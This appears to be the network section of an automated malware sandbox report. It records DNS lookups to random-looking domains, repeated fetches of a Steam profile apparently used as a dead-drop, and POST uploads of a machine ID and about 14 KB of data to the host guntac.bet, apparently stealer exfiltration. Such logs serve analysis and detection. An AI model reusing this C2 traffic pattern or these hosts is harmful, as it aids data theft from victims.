                                                                                                                                                                                                                                      Mar 13, 2025 16:40:23.588114977 CET49686443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:23.588160992 CET44349686104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:23.588255882 CET49686443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:23.588745117 CET49686443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:23.588762045 CET44349686104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:25.133518934 CET44349686104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:25.133636951 CET49686443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:25.135080099 CET49686443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:25.135092974 CET44349686104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:25.135339022 CET44349686104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:25.141170979 CET49686443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:25.188324928 CET44349686104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:26.109579086 CET44349686104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:38.765718937 CET44349695104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:38.765755892 CET44349695104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:38.765759945 CET49695443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:38.765805960 CET49695443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:38.766154051 CET49695443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:38.766177893 CET44349695104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:38.766189098 CET49695443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:38.766196012 CET44349695104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:38.833656073 CET49696443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:38.833709955 CET44349696104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:38.833782911 CET49696443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:38.834073067 CET49696443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:38.834084988 CET44349696104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:40.555061102 CET44349696104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:40.555150986 CET49696443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:40.556462049 CET49696443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:40.556489944 CET44349696104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:40.556749105 CET44349696104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:40.558160067 CET49696443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:40.600332975 CET44349696104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:40.999661922 CET44349696104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:40.999733925 CET44349696104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:40.999816895 CET49696443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:40.999861002 CET49696443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:40.999878883 CET44349696104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.609236002 CET49697443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.609282017 CET44349697104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.609431028 CET49697443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.609719992 CET49697443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.609730005 CET44349697104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.610938072 CET44349697104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.611269951 CET49698443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.611311913 CET44349698104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.611368895 CET49698443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.638282061 CET49698443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.638310909 CET44349698104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.639489889 CET44349698104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.639956951 CET49699443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.640007019 CET44349699104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.640088081 CET49699443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.642565012 CET49699443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.642620087 CET44349699104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.642663956 CET49699443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.643986940 CET49700443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.644026995 CET44349700104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.644094944 CET49700443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.644413948 CET49700443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.644424915 CET44349700104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.645468950 CET44349700104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.645886898 CET49701443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.645915031 CET44349701104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.646244049 CET49701443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.646262884 CET49701443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.646267891 CET44349701104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.647211075 CET44349701104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.647527933 CET49702443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.647559881 CET44349702104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.647612095 CET49702443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.647757053 CET49702443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.647785902 CET44349702104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.647825003 CET49702443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.658817053 CET49703443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.658862114 CET44349703104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.658922911 CET49703443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.659208059 CET49703443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.659230947 CET44349703104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.660278082 CET44349703104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.660556078 CET49704443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.660587072 CET44349704104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.660636902 CET49704443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.660980940 CET49704443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.660991907 CET44349704104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.661786079 CET44349704104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.662046909 CET49705443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.662082911 CET44349705104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.662141085 CET49705443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.662286043 CET49705443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.662314892 CET44349705104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.662358046 CET49705443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.663472891 CET49706443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.663495064 CET44349706104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.663670063 CET49706443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.663847923 CET49706443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.663861990 CET44349706104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.664632082 CET44349706104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.664923906 CET49707443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.664962053 CET44349707104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.665118933 CET49707443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.665337086 CET49707443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.665349007 CET44349707104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.666090012 CET44349707104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.666348934 CET49708443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.666361094 CET44349708104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:41.666435957 CET49708443192.168.2.8104.73.234.102
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 13, 2025 16:40:10.298320055 CET | 192.168.2.8 | 1.1.1.1 | 0xe2ce | Standard query (0) | begindecafer.world | A (IP address) | IN (0x0001) | false
Mar 13, 2025 16:40:10.318216085 CET | 192.168.2.8 | 1.1.1.1 | 0x91a8 | Standard query (0) | garagedrootz.top | A (IP address) | IN (0x0001) | false
Mar 13, 2025 16:40:10.735918999 CET | 192.168.2.8 | 1.1.1.1 | 0x1295 | Standard query (0) | modelshiverd.icu | A (IP address) | IN (0x0001) | false
Mar 13, 2025 16:40:10.750427961 CET | 192.168.2.8 | 1.1.1.1 | 0x1b6c | Standard query (0) | arisechairedd.shop | A (IP address) | IN (0x0001) | false
Mar 13, 2025 16:40:11.045207977 CET | 192.168.2.8 | 1.1.1.1 | 0x51b | Standard query (0) | catterjur.run | A (IP address) | IN (0x0001) | false
Mar 13, 2025 16:40:11.125636101 CET | 192.168.2.8 | 1.1.1.1 | 0x453d | Standard query (0) | orangemyther.live | A (IP address) | IN (0x0001) | false
Mar 13, 2025 16:40:11.141500950 CET | 192.168.2.8 | 1.1.1.1 | 0x712d | Standard query (0) | fostinjec.today | A (IP address) | IN (0x0001) | false
Mar 13, 2025 16:40:11.155872107 CET | 192.168.2.8 | 1.1.1.1 | 0x24f5 | Standard query (0) | sterpickced.digital | A (IP address) | IN (0x0001) | false
Mar 13, 2025 16:40:11.167422056 CET | 192.168.2.8 | 1.1.1.1 | 0xf18d | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Mar 13, 2025 16:40:14.322137117 CET | 192.168.2.8 | 1.1.1.1 | 0x1c0d | Standard query (0) | guntac.bet | A (IP address) | IN (0x0001) | false
Mar 13, 2025 16:40:23.579725981 CET | 192.168.2.8 | 1.1.1.1 | 0x4e6a | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 13, 2025 16:40:10.315671921 CET | 1.1.1.1 | 192.168.2.8 | 0xe2ce | Name error (3) | begindecafer.world | none | none | A (IP address) | IN (0x0001) | false
Mar 13, 2025 16:40:10.668797016 CET | 1.1.1.1 | 192.168.2.8 | 0x91a8 | Name error (3) | garagedrootz.top | none | none | A (IP address) | IN (0x0001) | false
Mar 13, 2025 16:40:10.748100996 CET | 1.1.1.1 | 192.168.2.8 | 0x1295 | Name error (3) | modelshiverd.icu | none | none | A (IP address) | IN (0x0001) | false
Mar 13, 2025 16:40:10.762106895 CET | 1.1.1.1 | 192.168.2.8 | 0x1b6c | Name error (3) | arisechairedd.shop | none | none | A (IP address) | IN (0x0001) | false
Mar 13, 2025 16:40:11.056554079 CET | 1.1.1.1 | 192.168.2.8 | 0x51b | Name error (3) | catterjur.run | none | none | A (IP address) | IN (0x0001) | false
Mar 13, 2025 16:40:11.138515949 CET | 1.1.1.1 | 192.168.2.8 | 0x453d | Name error (3) | orangemyther.live | none | none | A (IP address) | IN (0x0001) | false
Mar 13, 2025 16:40:11.153496027 CET | 1.1.1.1 | 192.168.2.8 | 0x712d | Name error (3) | fostinjec.today | none | none | A (IP address) | IN (0x0001) | false
Mar 13, 2025 16:40:11.165747881 CET | 1.1.1.1 | 192.168.2.8 | 0x24f5 | Name error (3) | sterpickced.digital | none | none | A (IP address) | IN (0x0001) | false
Mar 13, 2025 16:40:11.175271034 CET | 1.1.1.1 | 192.168.2.8 | 0xf18d | No error (0) | steamcommunity.com |  | 104.73.234.102 | A (IP address) | IN (0x0001) | false
Mar 13, 2025 16:40:14.339082956 CET | 1.1.1.1 | 192.168.2.8 | 0x1c0d | No error (0) | guntac.bet |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Mar 13, 2025 16:40:14.339082956 CET | 1.1.1.1 | 192.168.2.8 | 0x1c0d | No error (0) | guntac.bet |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Mar 13, 2025 16:40:23.587142944 CET | 1.1.1.1 | 192.168.2.8 | 0x4e6a | No error (0) | steamcommunity.com |  | 104.73.234.102 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                                      • steamcommunity.com
                                                                                                                                                                                                                                      • guntac.bet
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49682 | 104.73.234.102 | 443 | 6392 | C:\Users\user\Desktop\file.exe

Timestamp | Bytes transferred | Direction | Data
2025-03-13 15:40:13 UTC | 94 | OUT | GET /profiles/76561199822375128 HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Host: steamcommunity.com
2025-03-13 15:40:14 UTC | 1974 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                                                                                                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Date: Thu, 13 Mar 2025 15:40:13 GMT
                                                                                                                                                                                                                                      Content-Length: 36122
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: sessionid=3305f16f0b7ac2a954b67115; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                      Set-Cookie: steamCountry=US%7C38d449461b3bc36ddf11c3d8a68204d7; path=/; secure; HttpOnly; SameSite=None


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49683 | 188.114.97.3 | 443 | 6392 | C:\Users\user\Desktop\file.exe

Timestamp | Bytes transferred | Direction | Data
2025-03-13 15:40:15 UTC | 262 | OUT | POST /bSHsyZD HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Content-Length: 65
                                                                                                                                                                                                                                      Host: guntac.bet
2025-03-13 15:40:15 UTC | 65 | OUT | Data Ascii: uid=ed282de2492e515b5a600f7d9993d88a1a4bd6ca37dc2297a2a91518&cid=
2025-03-13 15:40:16 UTC | 771 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Thu, 13 Mar 2025 15:40:16 GMT
                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                      Content-Length: 14134
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qlpn8wfaYIt%2BbkkRsxntvzc08HSyRBXkG0uH9bpyuBSzwXebPb1g5WRaEO6G7ZktHNNsPW3l8YCrofK%2BM5GPATzhyOszw677NOSBsK8ZcKJdmxZ7dzPxpdCFp6h6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 91fca0f9c89d6f22-DFW
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=44204&min_rtt=44094&rtt_var=16756&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2821&recv_bytes=963&delivery_rate=64387&cwnd=32&unsent_bytes=0&cid=51954ef0307dbbe8&ts=969&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49684 | 104.73.234.102 | 443 | 6392 | C:\Users\user\Desktop\file.exe

Timestamp | Bytes transferred | Direction | Data
2025-03-13 15:40:19 UTC | 94 | OUT | GET /profiles/76561199822375128 HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Host: steamcommunity.com
2025-03-13 15:40:20 UTC | 1974 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                                                                                                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Date: Thu, 13 Mar 2025 15:40:20 GMT
                                                                                                                                                                                                                                      Content-Length: 36122
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: sessionid=e22140c5afaba0083d7f4fff; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                      Set-Cookie: steamCountry=US%7C38d449461b3bc36ddf11c3d8a68204d7; path=/; secure; HttpOnly; SameSite=None


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49685 | 188.114.97.3 | 443 | 6392 | C:\Users\user\Desktop\file.exe

Timestamp | Bytes transferred | Direction | Data
2025-03-13 15:40:22 UTC | 271 | OUT | POST /bSHsyZD HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=gDVu0p986
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Content-Length: 14490
                                                                                                                                                                                                                                      Host: guntac.bet
2025-03-13 15:40:22 UTC | 14490 | OUT | Data Ascii: --gDVu0p986Content-Disposition: form-data; name="uid"ed282de2492e515b5a600f7d9993d88a1a4bd6ca37dc2297a2a91518--gDVu0p986Content-Disposition: form-data; name="pid"2--gDVu0p986Content-Disposition: form-data; name="hwid"02D0F99E864BE7A1
2025-03-13 15:40:23 UTC | 814 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Thu, 13 Mar 2025 15:40:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sl0PTCKoVZG5n6ps%2Fu6c%2FeZs%2FXrzdHYoD%2FBWvUeQHi6xBpnV9qMGVn1MOP6iD70Se1v0AVFxoifu%2FW0uE7LV7RGzAI%2FHET7UgTGJJ1rVlbJxtfTK37%2FirMg3ktoF"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 91fca1200a996e66-DFW
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=39634&min_rtt=37693&rtt_var=13966&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2821&recv_bytes=15419&delivery_rate=62985&cwnd=32&unsent_bytes=0&cid=91b5ee9fb1337a61&ts=1116&x=0"
2025-03-13 15:40:23 UTC | 76 | IN |
                                                                                                                                                                                                                                      Data Ascii: 46{"success":{"message":"message success delivery from 70.173.200.173"}}
2025-03-13 15:40:23 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49686 | 104.73.234.102 | 443 | 6392 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-13 15:40:25 UTC | 94 | OUT | GET /profiles/76561199822375128 HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Host: steamcommunity.com
2025-03-13 15:40:26 UTC | 1974 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                                                                                                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Date: Thu, 13 Mar 2025 15:40:25 GMT
                                                                                                                                                                                                                                      Content-Length: 26508
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: sessionid=80b4cd3709ae942414d74a25; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                      Set-Cookie: steamCountry=US%7C38d449461b3bc36ddf11c3d8a68204d7; path=/; secure; HttpOnly; SameSite=None
2025-03-13 15:40:26 UTC | 14410 | IN |
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
2025-03-13 15:40:26 UTC | 12098 | IN |
                                                                                                                                                                                                                                      Data Ascii: k" id="language_pulldown" onclick="ShowMenu( this, 'language_dropdown', 'right' );">language</span><div class="popup_block_new" id="language_dropdown" style="display: none;"><div class="popup_body popup_menu">


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 49688 | 104.73.234.102 | 443 | 6392 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-13 15:40:28 UTC | 94 | OUT | GET /profiles/76561199822375128 HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Host: steamcommunity.com
2025-03-13 15:40:29 UTC | 1974 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
